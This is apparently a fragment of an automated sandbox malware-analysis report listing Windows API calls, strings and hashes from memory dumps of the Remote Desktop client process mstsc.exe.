                                                                                                              • LoadLibraryW.KERNEL32(comctl32.dll,?,00000000,?,?,007A590A,000003EC,00003ABF,00003AB5,00003ABE,00001000,00000009,00000001,0000FFFD,?,?), ref: 0087B0AB
                                                                                                              • GetProcAddress.KERNEL32(00000000,TaskDialogIndirect), ref: 0087B0C1
                                                                                                              • memset.MSVCRT ref: 0087B0DC
                                                                                                                • Part of subcall function 00883E7C: EventActivityIdControl.ADVAPI32(00000001,00000000,00000000,00000000,0088B068,?), ref: 00883E9E
                                                                                                              • FreeLibrary.KERNEL32(00000000,?,00000000,?,?,007A590A,000003EC,00003ABF,00003AB5,00003ABE,00001000,00000009,00000001,0000FFFD,?,?), ref: 0087B2FC
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Library$ActivityAddressControlEventFreeLoadProcmemset
                                                                                                              • String ID: TaskDialogIndirect$`$comctl32.dll
                                                                                                              • API String ID: 2217097755-1596583696
                                                                                                              • Opcode ID: a3a399870869b79640db68388b407412cb8ff01dd1070db55e88ba6dec509d7e
                                                                                                              • Instruction ID: a6c92ecb30f46a8bfb7ffa7c213af23e23a792bef7e5df91545d00fc2135ac67
                                                                                                              • Opcode Fuzzy Hash: a3a399870869b79640db68388b407412cb8ff01dd1070db55e88ba6dec509d7e
                                                                                                              • Instruction Fuzzy Hash: C8718E71A002589FDB24DF68CC94BDA77A6FB08304F1080EAE94CE7295D774DA848F61
                                                                                                              APIs
                                                                                                              • CryptUnprotectData.CRYPT32(Z:},00000000,00000000,00000000,00000000,00000001,?), ref: 008011CC
                                                                                                              • LocalAlloc.KERNEL32(00000040,?), ref: 008011EF
                                                                                                              • memcpy.MSVCRT(00000000,?,?), ref: 00801209
                                                                                                              • LocalFree.KERNEL32(?,00000000,?,?,007D3A5A), ref: 00801239
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                                                                                              • String ID: Z:}
                                                                                                              • API String ID: 3243516280-2507645324
                                                                                                              • Opcode ID: 20647d4ac7a0781f15122a34c15260d577e6ca1fd7562b013e766039405ce1f0
                                                                                                              • Instruction ID: 0331ee4905418bec28d20d8746f524ce7673735c60f6314ed74c3f106e994cbe
                                                                                                              • Opcode Fuzzy Hash: 20647d4ac7a0781f15122a34c15260d577e6ca1fd7562b013e766039405ce1f0
                                                                                                              • Instruction Fuzzy Hash: 0321A175E00219AFDF60DFA99C89EAFBBB9FF94760B15406DE815E7280E7308D009B50
                                                                                                              APIs
                                                                                                              • CryptProtectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,007BB9AF), ref: 0080112E
                                                                                                              • LocalAlloc.KERNEL32(00000040,007BB9AF,?,0080102A,007BB9AF,00000000,?,00000200,?,?,007BB9AF), ref: 0080113E
                                                                                                              • memcpy.MSVCRT(00000000,00000000,007BB9AF,?,0080102A,007BB9AF,00000000,?,00000200,?,?,007BB9AF), ref: 00801157
                                                                                                              • LocalFree.KERNEL32(00000000,00000000,00000000,00000200,?,0080102A,007BB9AF), ref: 00801178
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Local$AllocCryptDataFreeProtectmemcpy
                                                                                                              • String ID:
                                                                                                              • API String ID: 2336595795-0
                                                                                                              • Opcode ID: 63776777e31158e989fe8587312ce8453eb558690e8cc90e4461507caa43cc35
                                                                                                              • Instruction ID: 4ddb7d73bc2c6c2c66b1f984c5e62bfaf511e15400e1e6b37d226bfedb3dcc9f
                                                                                                              • Opcode Fuzzy Hash: 63776777e31158e989fe8587312ce8453eb558690e8cc90e4461507caa43cc35
                                                                                                              • Instruction Fuzzy Hash: 67218371E0021AABCF199F98DC49AAFBBB9FF04720F144069EA15E7390D7309D40CB90
                                                                                                              APIs
                                                                                                              • IsIconic.USER32(?), ref: 007A00C3
                                                                                                              • GetWindowPlacement.USER32(?,?), ref: 007A00DA
                                                                                                              • GetLastError.KERNEL32 ref: 007A00E4
                                                                                                                • Part of subcall function 00798010: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,00000000,Microsoft.Windows.RemoteDesktop), ref: 0079803E
                                                                                                                • Part of subcall function 00798010: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 00798050
                                                                                                                • Part of subcall function 00798010: FreeLibrary.KERNEL32(?), ref: 0079806F
                                                                                                                • Part of subcall function 00796842: TraceMessage.ADVAPI32(00000000,00000000,0000002B,007810E8,0000000B,0079A670,00000004,007D42C5,00000004,00000000,?,007D42C5,0079A670,00000000,00000000,00000000), ref: 0079685F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressErrorFreeHandleIconicLastLibraryMessageModulePlacementProcTraceWindow
APIs
• GetSystemInfo.KERNEL32(?,00000000,?,?,?,007F84D8,00000000,007F8B1A,000000E8,00000000,00000000), ref: 007F80D7
Similarity
• API ID: InfoSystem
APIs
• _wcsicmp.MSVCRT ref: 0079C1AB
• CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,0000153C,?,00000000), ref: 0079C1F8
• GetLastError.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,0000153C,?,00000000), ref: 0079C207
• CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,80000000,00000001,00000000,00000003,00000080,00000000,0000153C,?), ref: 0079C278
• GetLastError.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,0000153C,?,00000000), ref: 0079C287
• GetFileSize.KERNEL32(00000003,00000000,?,80000000,00000001,00000000,00000003,00000080,00000000,0000153C,?,00000000), ref: 0079C2DB
• GetFileSize.KERNEL32(00000000,00000000,?,80000000,00000001,00000000,00000003,00000080,00000000,0000153C,?,00000000), ref: 0079C2E8
• LocalAlloc.KERNEL32(00000040,00000000,?,80000000,00000001,00000000,00000003,00000080,00000000,0000153C,?,00000000), ref: 0079C2FD
• CloseHandle.KERNEL32(00000080,?,80000000,00000001,00000000,00000003,00000080,00000000,0000153C,?,00000000), ref: 0079C34B
• CloseHandle.KERNEL32(00000003,?,80000000,00000001,00000000,00000003,00000080,00000000,0000153C,?,00000000), ref: 0079C35B
• LocalFree.KERNEL32(00000000,?,80000000,00000001,00000000,00000003,00000080,00000000,0000153C,?,00000000), ref: 0079C366
• LocalFree.KERNEL32(00000000,?,80000000,00000001,00000000,00000003,00000080,00000000,0000153C,?,00000000), ref: 0079C371
• LocalAlloc.KERNEL32(00000040,00000000,?,80000000,00000001,00000000,00000003,00000080,00000000,0000153C,?,00000000), ref: 0079C388
• ReadFile.KERNEL32(80000000,00000000,00000000,80000000,00000000,?,80000000,00000001,00000000,00000003,00000080,00000000,0000153C,?,00000000), ref: 0079C3D5
• GetLastError.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,0000153C,?,00000000), ref: 0079C3DF
• ReadFile.KERNEL32(?,00000000,80000000,?,00000000,?,80000000,00000001,00000000,00000003,00000080,00000000,0000153C,?,00000000), ref: 0079C440
• GetLastError.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,0000153C,?,00000000), ref: 0079C44A
• memcmp.MSVCRT(00000080,00000000,00000000,?,80000000,00000001,00000000,00000003,00000080,00000000,0000153C,?,00000000), ref: 0079C4AB
Similarity
• API ID: File$ErrorLastLocal$AllocCloseCreateFreeHandleReadSize$_wcsicmpmemcmp
APIs
• memset.MSVCRT ref: 007D20BF
• memset.MSVCRT ref: 007D20D4
• GetModuleHandleW.KERNEL32(00000000,?,00000100), ref: 007D20E9
• memset.MSVCRT ref: 007D2154
• EnumDisplayDevicesW.USER32 ref: 007D22DB
• ShellMessageBoxW.SHLWAPI ref: 007D2300
  • Part of subcall function 00798010: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,00000000,Microsoft.Windows.RemoteDesktop), ref: 0079803E
  • Part of subcall function 00798010: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 00798050
  • Part of subcall function 00798010: FreeLibrary.KERNEL32(?), ref: 0079806F
  • Part of subcall function 00798086: TraceMessage.ADVAPI32(00000000,0079A670,0000002B,007810E8,0000000D,007D433C,00000004,00000000,?,007D433C,0079A670,00000000,00000000), ref: 0079809D
Similarity
• API ID: memset$HandleMessageModule$AddressDevicesDisplayEnumFreeLibraryProcShellTrace
• String ID: %d x %d; $%d: $(%d, %d, %d, %d)
APIs
• LoadLibraryW.KERNEL32(kernel32.dll,00000104,00000000,00000000), ref: 007DA0E0
• GetLastError.KERNEL32 ref: 007DA0EC
• GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 007DA14E
• GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 007DA15F
• memset.MSVCRT ref: 007DA181
• CreateProcessW.KERNEL32(?,?,00000000,00000000,00000001,00000010,00000000,00000000,?,?), ref: 007DA1C5
• GetLastError.KERNEL32 ref: 007DA1CF
• CloseHandle.KERNEL32(?), ref: 007DA222
• CloseHandle.KERNEL32(?), ref: 007DA22B
• FreeLibrary.KERNEL32(00000000), ref: 007DA2EF
  • Part of subcall function 00798010: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,00000000,Microsoft.Windows.RemoteDesktop), ref: 0079803E
  • Part of subcall function 00798010: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 00798050
  • Part of subcall function 00798010: FreeLibrary.KERNEL32(?), ref: 0079806F
  • Part of subcall function 00798086: TraceMessage.ADVAPI32(00000000,0079A670,0000002B,007810E8,0000000D,007D433C,00000004,00000000,?,007D433C,0079A670,00000000,00000000), ref: 0079809D
Strings
• Wow64DisableWow64FsRedirection, xrefs: 007DA148
• Wow64RevertWow64FsRedirection, xrefs: 007DA154
• kernel32.dll, xrefs: 007DA0D3
Similarity
• API ID: AddressHandleLibraryProc$CloseErrorFreeLast$CreateLoadMessageModuleProcessTracememset
• String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll
APIs
• memset.MSVCRT ref: 0080C0AE
• memset.MSVCRT ref: 0080C0BD
• LoadLibraryExW.KERNEL32(normaliz.dll,00000000,00000000), ref: 0080C0CC
• GetProcAddress.KERNEL32(00000000,IdnToNameprepUnicode), ref: 0080C125
• FreeLibrary.KERNEL32(00000000), ref: 0080C29B
  • Part of subcall function 00798010: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,00000000,Microsoft.Windows.RemoteDesktop), ref: 0079803E
  • Part of subcall function 00798010: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 00798050
  • Part of subcall function 00798010: FreeLibrary.KERNEL32(?), ref: 0079806F
  • Part of subcall function 00798086: TraceMessage.ADVAPI32(00000000,0079A670,0000002B,007810E8,0000000D,007D433C,00000004,00000000,?,007D433C,0079A670,00000000,00000000), ref: 0079809D
Similarity
• API ID: Library$AddressFreeProcmemset$HandleLoadMessageModuleTrace
• String ID: IdnToNameprepUnicode$IdnToUnicode$normaliz.dll$xn--
APIs
• GetClientRect.USER32(?,?), ref: 00816230
• GetLastError.KERNEL32(?,00000000,?), ref: 0081623A
  • Part of subcall function 00798010: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,00000000,Microsoft.Windows.RemoteDesktop), ref: 0079803E
  • Part of subcall function 00798010: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 00798050
  • Part of subcall function 00798010: FreeLibrary.KERNEL32(?), ref: 0079806F
  • Part of subcall function 00796842: TraceMessage.ADVAPI32(00000000,00000000,0000002B,007810E8,0000000B,0079A670,00000004,007D42C5,00000004,00000000,?,007D42C5,0079A670,00000000,00000000,00000000), ref: 0079685F
Similarity
• API ID: AddressClientErrorFreeHandleLastLibraryMessageModuleProcRectTrace
• String ID: (
APIs
• CredReadDomainCredentialsW.ADVAPI32(?,00000000,?,?,?,?,7FFFFFFE,000000FC,000000FC,00000001), ref: 007FB2A5
• CredDeleteW.ADVAPI32(?,00000002,00000000), ref: 007FB340
• GetLastError.KERNEL32 ref: 007FB34A
• CredDeleteW.ADVAPI32(?,00000002,00000000), ref: 007FB3BB
• GetLastError.KERNEL32 ref: 007FB3C5
• GetLastError.KERNEL32 ref: 007FB2AF
  • Part of subcall function 00798010: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,00000000,Microsoft.Windows.RemoteDesktop), ref: 0079803E
  • Part of subcall function 00798010: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 00798050
  • Part of subcall function 00798010: FreeLibrary.KERNEL32(?), ref: 0079806F
  • Part of subcall function 007A718E: TraceMessage.ADVAPI32(00000000,00000000,0000002B,007810E8,0000000A,0079A670,00000004,007D428A,0000000A,00000000,00000000,00000000,00000000,0000000A,?,007D428A), ref: 007A71E2
• CredFree.ADVAPI32(?), ref: 007FB437
Strings
• CredReadDomainCredentials failed, xrefs: 007FB304
• CredDelete for canonical name failed, xrefs: 007FB397
• CredDelete failed, xrefs: 007FB406
• StringCchCopy, xrefs: 007FB221
Similarity
• API ID: Cred$ErrorLast$DeleteFree$AddressCredentialsDomainHandleLibraryMessageModuleProcReadTrace
• String ID: CredDelete failed$CredDelete for canonical name failed$CredReadDomainCredentials failed$StringCchCopy
                                                                                                              • API String ID: 163554739-145328787
                                                                                                              • Opcode ID: 1eac364a10442f85ba16e48719f77028506d5b027bd9a4afe5f135c5e3f05715
                                                                                                              • Instruction ID: 15078adca2eedbd87ab676ed4a5576962ed9bf279936dd9c58d19774f6f18734
                                                                                                              • Opcode Fuzzy Hash: 1eac364a10442f85ba16e48719f77028506d5b027bd9a4afe5f135c5e3f05715
                                                                                                              • Instruction Fuzzy Hash: 0071F171A4025CABDB249F59DD88FB97BA5FF04310F2501AAEA04E72A2D738CD44DF91
APIs
• GetWindowLongW.USER32(?,000000EB), ref: 007A907A
• DefWindowProcW.USER32(?,?,?,?), ref: 007AC1A6
• SetBkMode.GDI32(?,00000001), ref: 007AC1B6
• GetStockObject.GDI32(00000005), ref: 007AC1BE
• GetDlgItem.USER32(?,00003393), ref: 007AC1CC
• SetTextColor.GDI32(?,00993300), ref: 007AC1DD
• GetDlgItem.USER32(?,00003394), ref: 007AC1E9
• SetTextColor.GDI32(?,00000000), ref: 007AC1F7
• GetClientRect.USER32(?,?), ref: 007AC20D
• CreateSolidBrush.GDI32(00FFFFFF), ref: 007AC218
• SelectObject.GDI32(?,00000000), ref: 007AC220
• PatBlt.GDI32(?,00000000,00000000,?,?,00F00021), ref: 007AC236
Memory Dump Source
• Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
• Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
Similarity
• API ID: ColorItemObjectTextWindow$BrushClientCreateLongModeProcRectSelectSolidStock
• String ID:
• API String ID: 1340860875-0
• Opcode ID: e92a83d8371f68b46fd2637fb04e5bc1c37a2f91fecff6dbe2221d4d7b21c9c3
• Instruction ID: 95e92f64fc7cdb4b2f2b4cbf2d67232f0cd1e380ca1c68e7cf31faa4a961a4b0
• Opcode Fuzzy Hash: e92a83d8371f68b46fd2637fb04e5bc1c37a2f91fecff6dbe2221d4d7b21c9c3
• Instruction Fuzzy Hash: 3B31B176200308BBDB029FBCED4DFAA7B69FF85710F400121F606E61E1DA759A118BA1
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.2806843490.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
• Associated: 00000008.00000002.2806843490.0000000004C69000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2806843490.0000000004C6D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2806843490.0000000004CDE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_4b40000_mstsc.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
• API String ID: 48624451-2108815105
• Opcode ID: 425f2b829a62e958a848c1683da6b57b5288d3b9a1f20e0c5410af428e5740e5
• Instruction ID: 6dbea695040ce0956f49725d993c8c23d88c348f821c538077a3e2ec15df8f67
• Opcode Fuzzy Hash: 425f2b829a62e958a848c1683da6b57b5288d3b9a1f20e0c5410af428e5740e5
• Instruction Fuzzy Hash: 0A510671A00666AFDB30DE9CCA9087EB7FAEF44204B04C4A9E496D7641E6F4FB40D760
APIs
• GetDlgItem.USER32(?,0000138C), ref: 007B0197
• GetSystemMetrics.USER32(0000000C), ref: 007B01F4
• GetSystemMetrics.USER32(0000000B), ref: 007B0214
• GetDlgItem.USER32(?,0000138C), ref: 007B0227
• SetDlgItemTextW.USER32(?,0000138A,?), ref: 007B03F1
• SetDlgItemTextW.USER32(?,0000138B,?), ref: 007B04C4
• SetDlgItemTextW.USER32(?,00001388,?), ref: 007B02C7
  • Part of subcall function 00798010: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,00000000,Microsoft.Windows.RemoteDesktop), ref: 0079803E
  • Part of subcall function 00798010: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 00798050
  • Part of subcall function 00798010: FreeLibrary.KERNEL32(?), ref: 0079806F
  • Part of subcall function 00798086: TraceMessage.ADVAPI32(00000000,0079A670,0000002B,007810E8,0000000D,007D433C,00000004,00000000,?,007D433C,0079A670,00000000,00000000), ref: 0079809D
  • Part of subcall function 007AF3D9: GetDC.USER32(00000000), ref: 007AF3E3
  • Part of subcall function 007AF3D9: GetDeviceCaps.GDI32(00000000,00000058), ref: 007AF3F2
  • Part of subcall function 007AF3D9: ReleaseDC.USER32(00000000,00000000), ref: 007AF3FD
• SetDlgItemTextW.USER32(?,0000138D,?), ref: 007B053D
  • Part of subcall function 00796842: TraceMessage.ADVAPI32(00000000,00000000,0000002B,007810E8,0000000B,0079A670,00000004,007D42C5,00000004,00000000,?,007D42C5,0079A670,00000000,00000000,00000000), ref: 0079685F
Strings
Memory Dump Source
• Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
• Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
Similarity
• API ID: Item$Text$MessageMetricsSystemTrace$AddressCapsDeviceFreeHandleLibraryModuleProcRelease
• String ID: 10.8
• API String ID: 2392498345-1857885434
• Opcode ID: d40328db2f073dc901d9977debbce77b24de1db708185deff3c2ad5547a22ad1
• Instruction ID: 3973e31ca31b0dbf1993a46efb689c070051ecdcb86a4e769bdb8e344031960e
• Opcode Fuzzy Hash: d40328db2f073dc901d9977debbce77b24de1db708185deff3c2ad5547a22ad1
• Instruction Fuzzy Hash: B9C1AF71200304EFEB29AF68DC89FAB37A9FB48300F14455EF645871E2DB79D8558B92
APIs
  • Part of subcall function 00798010: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,00000000,Microsoft.Windows.RemoteDesktop), ref: 0079803E
  • Part of subcall function 00798010: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 00798050
  • Part of subcall function 00798010: FreeLibrary.KERNEL32(?), ref: 0079806F
• CoCreateInstance.OLE32(0078A464,00000000,00000001,00789EE8,?), ref: 0081527F
Strings
• m_pSessionEventsDispatchImpl->Advise failed, xrefs: 008155F3
• m_spOleObject->DoVerb failed, xrefs: 00815495
• m_spOleObject->SetClientSite failed, xrefs: 0081542E
• AdjustWindowSize failed, xrefs: 008155A5
• CoCreateInstance failed, xrefs: 008152B0
• m_spViewer->QueryInterface failed, xrefs: 00815312, 00815372, 008153D2
• m_spViewer->Connect failed, xrefs: 00815562
• m_spViewer->put_SmartSizing failed, xrefs: 008154FA
Memory Dump Source
• Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
• Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
Similarity
• API ID: AddressCreateFreeHandleInstanceLibraryModuleProc
• String ID: AdjustWindowSize failed$CoCreateInstance failed$m_pSessionEventsDispatchImpl->Advise failed$m_spOleObject->DoVerb failed$m_spOleObject->SetClientSite failed$m_spViewer->Connect failed$m_spViewer->QueryInterface failed$m_spViewer->put_SmartSizing failed
• API String ID: 3463782917-643037495
• Opcode ID: e5f385d6170ed1e4c9a6cf406c8c8df543063391e3c100c4242f57bd87a9c3a2
• Instruction ID: eeae2b40332f7aedc2e7517bc6dc318cf6a2d6cf41ef0d359f35a4daa477e6ef
• Opcode Fuzzy Hash: e5f385d6170ed1e4c9a6cf406c8c8df543063391e3c100c4242f57bd87a9c3a2
• Instruction Fuzzy Hash: 4CC18E31250A10EFDB2A9F98DC88FA63B9AFF94314F190089F501DB5B2C764DC94CB92
APIs
• LocalFree.KERNEL32(?,?,?,00000104,00000002,000004A4,00000000,00000000,000004A4), ref: 007AE104
  • Part of subcall function 00798010: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,00000000,Microsoft.Windows.RemoteDesktop), ref: 0079803E
  • Part of subcall function 00798010: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 00798050
  • Part of subcall function 00798010: FreeLibrary.KERNEL32(?), ref: 0079806F
Strings
Memory Dump Source
• Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
• Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
Similarity
• API ID: Free$AddressHandleLibraryLocalModuleProc
• String ID: Default$RemoteDesktopFolder$Root folder in current directory.
• API String ID: 1449440781-1843079594
• Opcode ID: b89e610b79b38fe1edfae14233203367ee77e01bdcd03df7f7044a6bfc40bf15
• Instruction ID: 986775cd69834c28aac3f9c9b16ece37313d2776082beae79da3f1378a49fd84
• Opcode Fuzzy Hash: b89e610b79b38fe1edfae14233203367ee77e01bdcd03df7f7044a6bfc40bf15
• Instruction Fuzzy Hash: A6B1D271200240AFEB2D9F98D89DF6A3B6AFB8A304F184659F601CB1E2D77DD890D751
APIs
• GetDlgItem.USER32(00000000,00003309), ref: 007C4078
• IsDlgButtonChecked.USER32(00000000,00003310), ref: 007C4091
• GetDlgItem.USER32(00000000,00003309), ref: 007C410A
• EnableWindow.USER32(00000000), ref: 007C4111
• SendMessageW.USER32(?,0000040A,00000001,00000000), ref: 007C4123
• SendMessageW.USER32(?,00000405,00000001,?), ref: 007C4134
• SendMessageW.USER32(00000000,00000400,00000000,00000000), ref: 007C4151
• SendMessageW.USER32(00000000,00000405,00000001,?), ref: 007C416A
• GetDlgItem.USER32(00000000,00003309), ref: 007C4180
• EnableWindow.USER32(00000000), ref: 007C4187
Memory Dump Source
• Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
• Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
Similarity
• API ID: MessageSend$Item$EnableWindow$ButtonChecked
• String ID:
• API String ID: 1728075932-0
• Opcode ID: 19abdbdb3ed7bd904a4dd95329311a78f978806cfdb37b967bfd878e8d3a5586
• Instruction ID: 391a61b45a4c3bf941ce286fbdd6fc9b3f4354ffd0f9138e729374de0ff635be
• Opcode Fuzzy Hash: 19abdbdb3ed7bd904a4dd95329311a78f978806cfdb37b967bfd878e8d3a5586
• Instruction Fuzzy Hash: D531E131640304BBDB10EB28CC99FAABB68FB54714F14812DFB05EB1D1DB3599828BA0
APIs
• RegQueryValueExW.ADVAPI32(00000000,LogonMethod,00000000,00000000,?,?,?,?,00000000), ref: 007FD134
• RegQueryValueExW.ADVAPI32(00000000,AllowExplicitLogonMethod,00000000,00000000,?,00000004), ref: 007FD1B5
Strings
Memory Dump Source
• Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
• Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
Similarity
• API ID: QueryValue
• String ID: AllowExplicitLogonMethod$LogonMethod$hGPKey$isEnforcedByGP$isGPDefined$pAuthSchemes
• API String ID: 3660427363-3792728693
• Opcode ID: b03384df01796e43438a8c313e9b4e784097bcfd979636cf7f3a35aabc4b52ff
• Instruction ID: ea9bf224190e57384bd0cd1abe46e819dceaafb1e60f546895f8884d4ea78574
• Opcode Fuzzy Hash: b03384df01796e43438a8c313e9b4e784097bcfd979636cf7f3a35aabc4b52ff
• Instruction Fuzzy Hash: B051D2B1540248EFEB3A9F58C888F757FA7BB40314F2140A9EA059B2A2D778CD41CB51
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 00884148
                                                                                                                • Part of subcall function 00798010: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,00000000,Microsoft.Windows.RemoteDesktop), ref: 0079803E
                                                                                                                • Part of subcall function 00798010: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 00798050
                                                                                                                • Part of subcall function 00798010: FreeLibrary.KERNEL32(?), ref: 0079806F
                                                                                                                • Part of subcall function 00798086: TraceMessage.ADVAPI32(00000000,0079A670,0000002B,007810E8,0000000D,007D433C,00000004,00000000,?,007D433C,0079A670,00000000,00000000), ref: 0079809D
                                                                                                              Strings
                                                                                                              • Failed to get module specific class name, xrefs: 008841E6
                                                                                                              • PAL_SYS_WIN32_TIMER_WNDCLASS, xrefs: 0088415F
                                                                                                              • Failed StringCchPrintf, xrefs: 0088419D
                                                                                                              • %p-%s, xrefs: 00884169
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressFreeHandleLibraryMessageModuleProcTracememset
                                                                                                              • String ID: %p-%s$Failed StringCchPrintf$Failed to get module specific class name$PAL_SYS_WIN32_TIMER_WNDCLASS
                                                                                                              • API String ID: 1171831687-1526586533
                                                                                                              • Opcode ID: 532b38b7caf88e4602cbef5fbfe46b97a079f0ac65e41af9f4a7868f7f101438
                                                                                                              • Instruction ID: 157749f4729b40f3c2d9016589ef54dd9092794489061db9d01cd3ea6860a3ab
